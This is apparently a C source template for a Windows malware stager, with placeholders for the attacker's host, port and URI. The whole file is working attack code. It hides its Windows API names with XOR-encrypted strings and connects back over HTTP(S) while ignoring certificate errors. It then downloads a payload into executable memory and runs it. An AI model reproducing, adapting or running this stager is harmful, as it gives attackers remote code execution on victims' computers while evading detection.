/*! @brief The user agent to use for the HTTP requests. */
#define USER_AGENT "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"

%{DEFINITIONS}

/*!
 * @brief Connects to a provided host/port, downloads a payload and executes it.
 * @param host String containing the name or IP of the host to connect to.
 * @param port Port number to connect to.
 * @param initialUri The URI to perform the connect back on (eg "/XXXX").
 * @param useSSL Flag to indicate the use of SSL or not.
 */

VOID reverse_http_rdl(const char* host, u_short port, const char* initialUri, BOOL useSSL)
{
  // Use Runtime Dynamic Linking to grab the addresses of some functions we need
  %{VARS1}
  char cbWininet[] = { CRYPT11('w','i','n','i','n','e','t','.','d','l','l'),XOR_KEY };
  	char cbWinsock[] = { CRYPT10('W','s','2','_','3','2','.','d','l','l'),XOR_KEY };
  	char cbKernel[] = { CRYPT12('k','e','r','n','e','l','3','2','.','d','l','l'),XOR_KEY };
  	char cbInternetOpen[] = { CRYPT13('I', 'n', 't', 'e', 'r', 'n', 'e', 't', 'O', 'p', 'e', 'n', 'A'), XOR_KEY };
  	char cbInternetConnect[] = { CRYPT16('I', 'n', 't', 'e', 'r', 'n', 'e', 't', 'C', 'o', 'n', 'n', 'e', 'c', 't', 'A'), XOR_KEY };
  %{VARS2}
  	char cbHttpOpenRequest[] = { CRYPT16('H', 't', 't', 'p', 'O', 'p', 'e', 'n', 'R', 'e', 'q', 'u', 'e', 's', 't', 'A'), XOR_KEY };
  	char cbInternetQueryOption[] = { CRYPT20('I', 'n', 't', 'e', 'r', 'n', 'e', 't', 'Q', 'u', 'e', 'r', 'y', 'O', 'p', 't', 'i', 'o', 'n', 'A'), XOR_KEY };
  	char cbInternetSetOption[] = { CRYPT18('I', 'n', 't', 'e', 'r', 'n', 'e', 't', 'S', 'e', 't', 'O', 'p', 't', 'i', 'o', 'n', 'A'), XOR_KEY };
  	char cbHttpSendRequest[] = { CRYPT16('H', 't', 't', 'p', 'S', 'e', 'n', 'd', 'R', 'e', 'q', 'u', 'e', 's', 't', 'A'), XOR_KEY };
  %{VARS3}
  	char cbHttpQueryInfo[] = { CRYPT14('H', 't', 't', 'p', 'Q', 'u', 'e', 'r', 'y', 'I', 'n', 'f', 'o', 'A'), XOR_KEY };
  	char cbInternetReadFile[] = { CRYPT16('I', 'n', 't', 'e', 'r', 'n', 'e', 't', 'R', 'e', 'a', 'd', 'F', 'i', 'l', 'e'), XOR_KEY };
  	char cbInternetCloseHandle[] = { CRYPT19('I', 'n', 't', 'e', 'r', 'n', 'e', 't', 'C', 'l', 'o', 's', 'e', 'H', 'a', 'n', 'd', 'l', 'e'), XOR_KEY };
  	char cbVirtualAlloc[] = { CRYPT12('V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 'o', 'c'), XOR_KEY };
  	char cbWSAGetLastError[] = { CRYPT15('W', 'S', 'A', 'G', 'e', 't', 'L', 'a', 's', 't', 'E', 'r', 'r', 'o', 'r'), XOR_KEY };
  	char cbGetLastError[] = { CRYPT12('G', 'e', 't', 'L', 'a', 's', 't', 'E', 'r', 'r', 'o', 'r'), XOR_KEY };
  %{VARS4}

    %{FUNCTIONS1}
  	LIBLOAD(hWininet, cbWininet);
    %{FUNCTIONS2}
  	LIBLOAD(hKernel, cbKernel);
  	%{FUNCTIONS3}

  	// Use Runtime Dynamic Linking to grab the addresses of some functions we need
  	typedef HINTERNET(__stdcall *InternetOpenAProto)(LPCSTR, DWORD, LPCSTR, LPCSTR, DWORD);
  	RDLLOAD(InternetOpenARDL, InternetOpenAProto, hWininet, cbInternetOpen);

  	typedef HINTERNET(__stdcall *InternetConnectAProto)(HINTERNET, LPCSTR, INTERNET_PORT, LPCSTR, LPCSTR, DWORD, DWORD, DWORD_PTR);
  	RDLLOAD(InternetConnectARDL, InternetConnectAProto, hWininet, cbInternetConnect);

  	typedef HINTERNET(__stdcall *HttpOpenRequestAProto)(HINTERNET, LPCSTR, LPCSTR, LPCSTR, LPCSTR, LPCSTR*, DWORD, DWORD_PTR);
  	RDLLOAD(HttpOpenRequestARDL, HttpOpenRequestAProto, hWininet, cbHttpOpenRequest);

  	%{FUNCTIONS4}

  	typedef BOOL(__stdcall *InternetQueryOptionAProto)(HINTERNET, DWORD, LPVOID, LPDWORD);
  	RDLLOAD(InternetQueryOptionARDL, InternetQueryOptionAProto, hWininet, cbInternetQueryOption);

  	typedef BOOL(__stdcall *InternetSetOptionAProto)(HINTERNET, DWORD, LPVOID, DWORD);
  	RDLLOAD(InternetSetOptionARDL, InternetSetOptionAProto, hWininet, cbInternetSetOption);

  	typedef BOOL(__stdcall *HttpSendRequestAProto)(HINTERNET, LPCSTR, DWORD, LPVOID, DWORD);
  	RDLLOAD(HttpSendRequestARDL, HttpSendRequestAProto, hWininet, cbHttpSendRequest);

  	typedef BOOL(__stdcall *HttpQueryInfoAProto)(HINTERNET, DWORD, LPVOID, LPDWORD, LPDWORD);
  	RDLLOAD(HttpQueryInfoARDL, HttpQueryInfoAProto, hWininet, cbHttpQueryInfo);

  	typedef BOOL(__stdcall *InternetReadFileProto)(HINTERNET, LPVOID, DWORD, LPDWORD);
  	RDLLOAD(InternetReadFileRDL, InternetReadFileProto, hWininet, cbInternetReadFile);

  	%{FUNCTIONS5}

  	typedef BOOL(__stdcall *InternetCloseHandleProto)(HINTERNET);
  	RDLLOAD(InternetCloseHandleRDL, InternetCloseHandleProto, hWininet, cbInternetCloseHandle);

  	typedef LPVOID(__stdcall *VirtualAllocProto)(LPVOID, size_t, DWORD, DWORD);
  	RDLLOAD(VirtualAllocRDL, VirtualAllocProto, hKernel, cbVirtualAlloc);

  	typedef int(__stdcall *GetLastErrorProto)();
  	RDLLOAD(GetLastErrorRDL, GetLastErrorProto, hKernel, cbGetLastError);

  	%{FUNCTIONS6}

  // Get things started with opening the entire internet
  HINTERNET hInternet = InternetOpenARDL(USER_AGENT, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
  if (hInternet == NULL)
  {
    exit(GetLastErrorRDL());
  }

  // Spin up a connection instance via the "entire internet" handle which we can use to make requests.
  HINTERNET hConnect = InternetConnectARDL(hInternet, host, port, NULL, NULL, INTERNET_SERVICE_HTTP, 0, NULL);
  if (hConnect == NULL)
  {
    exit(GetLastErrorRDL());
  }

  // SSL requires a magic set of flags to work propertly, plus we'll ignore the usual
  // errors that you'd get in the browser when hitting dodgy certs.
  DWORD flags = 0;
  if (useSSL)
  {
    flags = INTERNET_FLAG_SECURE
          | INTERNET_FLAG_IGNORE_CERT_CN_INVALID
          | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
          | INTERNET_FLAG_NO_UI
          | INTERNET_FLAG_NO_CACHE_WRITE;
  }

  // Initialise a request, but don't submit it yet.
  const char* acceptTypes[] = { "text/*", NULL };
  HINTERNET hRequest = HttpOpenRequestARDL(hConnect, "GET", initialUri, NULL, NULL, acceptTypes, flags, 0);
  if (hRequest == NULL)
  {
    exit(GetLastErrorRDL());
  }

  // Again, in the case of SSL, we have to do some magic to make sure that the
  // connection doesn't error out because of a bad/unknown CA.
  if (useSSL)
  {
    DWORD secFlags;
    DWORD secFlagsBuf = sizeof(secFlags);
    InternetQueryOptionARDL(hRequest, INTERNET_OPTION_SECURITY_FLAGS, &secFlags, &secFlagsBuf);
    secFlags |= (SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | SECURITY_FLAG_IGNORE_REVOCATION );
    InternetSetOptionARDL(hRequest, INTERNET_OPTION_SECURITY_FLAGS, &secFlags, sizeof(secFlags));
  }

  // with everything out of the way, we can make the request to get the payload.
    if (!HttpSendRequestARDL(hRequest, NULL, 0, NULL, 0))
    {
      // IN XP SP0 we have to set the flag for ignore unknwon CA AFTER it has already failed once
      // So if we fail for that reason we set that flag here and retry it.
      if (GetLastErrorRDL() == 12045)
      {
          DWORD secFlags;
          DWORD secFlagsBuf = sizeof(secFlags);
          InternetQueryOptionARDL(hRequest, INTERNET_OPTION_SECURITY_FLAGS, &secFlags, &secFlagsBuf);
          secFlags |= (SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | SECURITY_FLAG_IGNORE_REVOCATION);
          InternetSetOptionARDL(hRequest, INTERNET_OPTION_SECURITY_FLAGS, &secFlags, sizeof(secFlags));
          if (!HttpSendRequestARDL(hRequest, NULL, 0, NULL, 0))
            {
              exit(GetLastErrorRDL());
            }
      }
      else
      {
          exit(GetLastErrorRDL());
      }
    }

  // Find out the payload size
  DWORD payloadSize = 0;
  DWORD bytesRead = sizeof(payloadSize);
  if (!HttpQueryInfoARDL(hRequest, HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER, &payloadSize, &bytesRead, NULL))
  {
    exit(GetLastError());
  }

  // Prepare to read the whole request into memory.
  char* payload = (char*)VirtualAllocRDL(0, payloadSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  if (payload == NULL)
  {
    exit(GetLastErrorRDL());
  }

  // Keep looping and reading until the whole payload is loaded.
  DWORD totalBytesRead = 0;
  while (totalBytesRead < payloadSize
    && InternetReadFileRDL(hRequest, payload + totalBytesRead, payloadSize - totalBytesRead, &bytesRead)
    && bytesRead != 0)
  {
    totalBytesRead += bytesRead;
  }

  // Close down the entire internet.
  InternetCloseHandleRDL(hRequest);
  InternetCloseHandleRDL(hConnect);
  InternetCloseHandleRDL(hInternet);

  %{FUNCTIONS7}
  // cast our payload to a function pointer and run it.
  ((void(*)())payload)();
}

int main(void) {
  %{VARS5}
  char host[256] = "%{HOST}";
  short port = %{PORT};
  char uri[512] = "%{URI}";
  %{VARS6}
  %{FUNCTIONS8}
  reverse_http_rdl(host, port, uri, %{SSL});

  return 0;
}
